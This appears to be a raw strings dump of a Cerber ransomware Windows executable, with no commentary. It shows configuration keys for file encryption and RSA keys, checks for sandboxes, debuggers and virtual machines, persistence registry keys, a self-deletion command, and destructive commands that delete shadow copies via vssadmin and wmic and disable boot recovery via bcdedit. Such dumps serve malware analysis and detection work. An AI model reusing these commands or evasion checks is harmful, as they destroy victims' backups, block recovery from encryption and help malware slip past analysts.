!This program cannot be run in DOS mode.
`.rdata
@.data
Nwtv=>
SUVWh0
QSUVWhl
tD9 v7
D$,PVVh
VWSSSj
;GTwVS
D$$PVVh
D$pVVSSSSh
xnh,#A
t@h8pA
SVWhx#A
t>Ht)Ht
[Sht$A
tEVWWWj
t)WWWj
tGh|%A
tsSSSSP
QQSUVW
QQSVh8
t5h$&A
PSSh<&A
SSSSSS
SVWhT)A
SUVWh8
t~hl)A
_^][YY
PWWhP*A
Eff;Epu
Eg9uxvR
j,h`0A
PVVVVVVS
PWhh+A
?@s"9t$
jdhP0A
PVVh8-A
PSSSSSSh
t)h\-A
Ht Hu<
t~HHtt
KHt"Ht
st(IIt
<+uH<-
L$49L$8s
C;\$<r
D$49D$8s
D$49D$8s
D$49D$8s
SVWj [;
Xt#X\3
p|3Hx3
#x|#px3
>nosju
8{ujP3
X<-t?<0|
<9~7<[u
VC20XC00U
;t$(v(
UQPXY]Y[
NKagj(h
Fcerber
wine_get_unix_file_name
close_process
encrypt
multithread
max_block_size
max_blocks
min_file_size
rsa_key_size
global_public_key
autoElevate
requestedExecutionLevel
requireAdministrator
SHCreateItemFromParsingName
Stop reason: %s
%02x%02x%02x%02x%02x%02x%05xcerber
%02X%02X%02X%02X%02X%02X%05X%03X
%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c
data len: %d, trash len: %d, overlay: %s
default
site_%d
servers
statistics
timeout
%[^/]%[/]%d
Sending stat %s, %s
data_start
data_finish
{IS_ADMIN}
{IS_X64}
{COUNTRY}
{PARTNER_ID}
{PC_ID}
{STOP_REASON}
{MD5_KEY}
%02X%02X%02X%02X%02X%02X
{COUNT_FILES}
{SITE_
av_blacklist
kernel32.dll
blacklist
languages
ip_geo
property_name
countries
network
vmware
country
language
activity
send_stat
wallpaper
background
help_files
files_name
file_extension
file_body
new_extension
folders
whitelist
IsWow64Process
kernel32
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Wow64DisableWow64FsRedirection
0123456789abcdef
"= '()\/
+-0123456789.Ee
CryptDecodeObjectEx
CryptImportPublicKeyInfo
CRYPT32.dll
InternetConnectA
InternetCrackUrlA
InternetReadFile
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
StrStrIW
StrCmpNIW
StrCpyNW
StrChrIA
StrStrIA
PathFindFileNameW
StrSpnA
StrCmpNIA
PathRemoveExtensionW
StrToIntA
StrChrA
StrChrW
StrCmpNW
PathMatchSpecW
SHLWAPI.dll
GetFileVersionInfoSizeW
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VERSION.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
CheckSumMappedFile
imagehlp.dll
WS2_32.dll
FreeResource
FindResourceW
LoadResource
SizeofResource
LockResource
SetErrorMode
GetSystemWindowsDirectoryW
GetModuleHandleW
CreateFileW
OpenMutexW
GetLastError
GetVolumeInformationW
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
wsprintfW
GetSystemDirectoryW
lstrcatW
lstrlenW
GetProcAddress
GetDateFormatW
SetFilePointer
SetFilePointerEx
WaitForSingleObject
SetEvent
OutputDebugStringW
SetFileTime
WriteFile
InitializeCriticalSection
LeaveCriticalSection
GetTimeFormatW
GetFileAttributesW
FileTimeToSystemTime
ReadFile
GetFileSizeEx
MoveFileW
EnterCriticalSection
CreateEventW
CryptDestroyKey
GetFileTime
DeleteCriticalSection
CloseHandle
FileTimeToLocalFileTime
lstrcpyW
CreateThread
CryptAcquireContextW
CryptGetKeyParam
CryptEncrypt
LocalFree
ExitProcess
CoUninitialize
ShellExecuteExW
GetForegroundWindow
CoInitializeEx
GetTempFileNameW
GetFileSize
CoCreateInstance
MapViewOfFile
UnmapViewOfFile
FreeLibrary
CreateProcessW
LoadLibraryExW
LoadLibraryW
CopyFileW
ReadProcessMemory
GetSystemWow64DirectoryW
lstrcpynW
TerminateProcess
FlushInstructionCache
FlushFileBuffers
GetTempPathW
VirtualAllocEx
CreateFileMappingW
ZwQueryInformationProcess
OpenEventW
WinExec
GetWindowsDirectoryW
DeleteFileW
WriteProcessMemory
ResumeThread
FindFirstFileW
GetModuleFileNameW
FindClose
SetFileAttributesW
DispatchMessageW
DefWindowProcW
CreateMutexW
RegisterClassW
GetCurrentProcess
CreateWindowExW
GetCurrentThread
PeekMessageW
TranslateMessage
SetThreadPriority
SHGetFolderPathW
wsprintfA
SetCurrentDirectoryW
OutputDebugStringA
SetProcessShutdownParameters
CoInitializeSecurity
CharLowerBuffA
lstrlenA
GetSystemMetrics
lstrcpyA
GetEnvironmentVariableW
GetKeyboardLayoutList
RegCreateKeyExW
SHChangeNotify
GetVersionExW
lstrcmpiA
GetTickCount
RegOpenKeyW
GetModuleFileNameA
GetStockObject
GetObjectW
CreateFontW
ReleaseDC
SystemParametersInfoW
CreateCompatibleBitmap
MulDiv
CreateCompatibleDC
SelectObject
DeleteObject
SetPixel
SetBkColor
GetDIBits
GetDeviceCaps
DeleteDC
SetTextColor
DrawTextA
FillRect
GetNativeSystemInfo
GetDriveTypeW
GetLogicalDrives
VirtualFree
VirtualAlloc
ShellExecuteW
QueryDosDeviceW
FindNextFileW
RegSetValueExW
KERNEL32.dll
HeapReAlloc
HeapAlloc
HeapFree
HeapCreate
HeapValidate
SetLastError
GetProcessHeaps
HeapSetInformation
GetCurrentProcessId
GetComputerNameA
OpenProcessToken
GetTokenInformation
GetLastInputInfo
ZwQuerySystemInformation
OpenProcess
ZwOpenDirectoryObject
LookupPrivilegeValueW
ZwClose
GetHandleInformation
SetKernelObjectSecurity
Process32FirstW
ZwOpenProcess
ConvertStringSecurityDescriptorToSecurityDescriptorW
GetSystemInfo
Process32NextW
lstrcmpiW
GetModuleHandleA
VirtualProtect
CreateToolhelp32Snapshot
AdjustTokenPrivileges
ZwOpenSection
ADVAPI32.dll
USER32.dll
SearchPathW
GetFileAttributesA
RtlFreeUnicodeString
NtDeleteFile
RtlDosPathNameToNtPathName_U
memmove
WideCharToMultiByte
MultiByteToWideChar
lstrcpynA
ole32.dll
SHELL32.dll
IsBadWritePtr
TlsAlloc
ntdll.dll
NetUserGetInfo
NetApiBufferFree
NetUserEnum
GetLengthSid
ConvertSidToStringSidW
ExpandEnvironmentStringsW
CreateDirectoryW
DuplicateToken
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
CreateWellKnownSid
RegisterClassExW
UnregisterClassW
OLEAUT32.dll
GDI32.dll
IsBadStringPtrW
IsBadReadPtr
IsBadCodePtr
IsBadStringPtrA
GetCurrentThreadId
WaitForMultipleObjects
isspace
NETAPI32.dll
CoInitialize
RegDeleteValueW
RegEnumValueW
RegFlushKey
CryptStringToBinaryA
CryptBinaryToStringA
StrPBrkA
PathCombineW
PathUnquoteSpacesW
PathSkipRootW
StrToInt64ExA
GetFileVersionInfoW
VerQueryValueW
memset
_aulldvrm
memcpy
_allmul
_chkstk
_alldiv
RtlUnwind
NtQueryVirtualMemory
YYYYYYYYYYYY
}YPPPPYYYYa
``YYYYYYYYYYY
JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ
d[[[[[
[[[[[[[[[[[[js
[RRRR[[[[w|w
vv[[[[[[[[[[[
@@@@AI@@@@LB@@@@@@@@ODS@@@DWC\@`@@@@@@@@@@@@@@dfnk@@jF@@DF@@[D@@
NJv5k6
wMdr3B)J
5RW^f-
Vc5ho<
W*)xE2
0wx-+)e
M6Vxt:/
Py4Dc'
H:]h7W
P3[ \,
',qqd>dG
YJF ]E8^
E|Qa_;
(JmxdhT
AQ-MMR
m_Wt:HZ
T\cc fFcM
'Ah0X$a
aK~?BA$
u%L7`{v
]<yf|q
a`ac"Q6
cBdG^Xq
CZQ|]Y
j]V1sF~
sPl$&J
vlm$j,(
<~C4#R
pbAa|DZ
RB?TOt
Y4KKvD
tcTTu=
~(8X_'=
Q>a_iAwO
MywEen
a 6k-y
KUG?~QI
SAF45a8
GD{;/K
A^lG7X,
"6]I}r
C*R%#j
1nVVD7
-*q99
@_J5W=
"D`ilT
d7&98J
/n&=H&
92g6l7o
op8bq|
OU<d
*LaUH
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
sbiedll.dll
dir_watch.dll
api_log.dll
test_item.exe
dbghelp.dll
Frz_State
C:\popupkiller.exe
C:\stimulator.exe
C:\TOOLS\execute.exe
\sand-box\
\cwsandbox\
\sandbox\
\\.\NPF_NdisWanIp
\\.\cv2k1
wireshark.exe
dumpcap.exe
ollydbg.exe
idag.exe
sysanalyzer.exe
sniff_hit.exe
scktool.exe
proc_analyzer.exe
hookexplorer.exe
multi_pot.exe
VEN_%x
SYSTEM\CurrentControlSet\Enum\PCI
SystemBiosVersion
HARDWARE\Description\System
PARALLELS
VideoBiosVersion
Identifier
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
VIRTUALBOX
SOFTWARE\Oracle\VirtualBox Guest Additions
\drivers\
VBoxMouse.sys
VMWARE
WMWARE
SOFTWARE\VMware, Inc.\VMware Tools
vmmouse.sys
vmhgfs.sys
ekernel32.dll
%s\%s%S
Encrypting file %s...
Modified at %s %s
files.txt
Component_00
Component_01
/d /c start "" "%s"
%COMSPEC%
"%s\explorer.exe"
eshell32.dll
netstat
ftp.exe
attrib
lookup
winlogon
msiexec
logoff
notepad
winmine
telnet
ntbackup
mshearts
freecell
cmd.exe
spider
sol.exe
install
update
\x*x.exe
CERBER_CORE_PROTECTION_MUTEX
shell.%s
CERBER_EVALUATED_CORE_PROTECTION_EVENT
"%s\%s"
CERBER_BODY_PLACE
SeDebugPrivilege
sComponent_02
ProgramFilesDir (x86)
SOFTWARE\Microsoft\Windows\CurrentVersion
ProgramFilesDir
C:\test\cerber_debug.txt
Installed
COMSPEC
/d /c taskkill /t /f /im "%s" > NUL & ping -n 1 127.0.0.1 > NUL & del "%s" > NUL
%s\vssadmin.exe
delete shadows /all /quiet
%s\wbem\wmic.exe
shadowcopy delete
/set {default} recoveryenabled no
bcdedit.exe
/set {default} bootstatuspolicy ignoreallfailures
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA
Consolas
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
CERBER_KEY_PLACE
Printers\Defaults\%s
api-ms-win-
\KnownDlls32
\KnownDlls
\VarFileInfo\Translation
FileDescription
\StringFileInfo\%04x%04x\%s
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
0123456789
~!@#$%^&*+=
[]{}()<>
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
ProfileImagePath
%s\*.lnk
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Command Processor
AutoRun
Control Panel\Desktop
SCRNSAVE.EXE
.DEFAULT